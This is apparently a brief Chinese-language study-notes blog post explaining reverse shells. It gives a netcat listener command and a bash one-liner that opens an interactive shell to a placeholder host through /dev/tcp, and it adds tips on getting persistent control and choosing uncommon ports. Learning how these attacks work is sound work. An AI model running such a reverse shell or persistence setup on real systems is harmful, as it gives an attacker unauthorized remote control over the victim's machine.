反弹shell

反弹shell

学习笔记
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发器请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
持久化控制,通过每隔一段时间执行反弹shell即可获取持久化控制。
端口使用不固定。(尽量找一些不常用的端口。)

nc -lnvp 12345      #服务端开启监听12345端口
bash -i >& /dev/tcp/x.x.x.x/12345 0>&1 #客户端向x.x.x.x建立交互连接

-i: 产生交互式的shell
/dev/tcp/: linux中一切皆文件
>&: 混合输出
服务器:
反弹shell
客户端:
反弹shell
服务端:
反弹shell

上一篇:mysql 和 sqlalchemy 的一个测试环境


下一篇:【Jmeter】性能测试--EMQ X 压测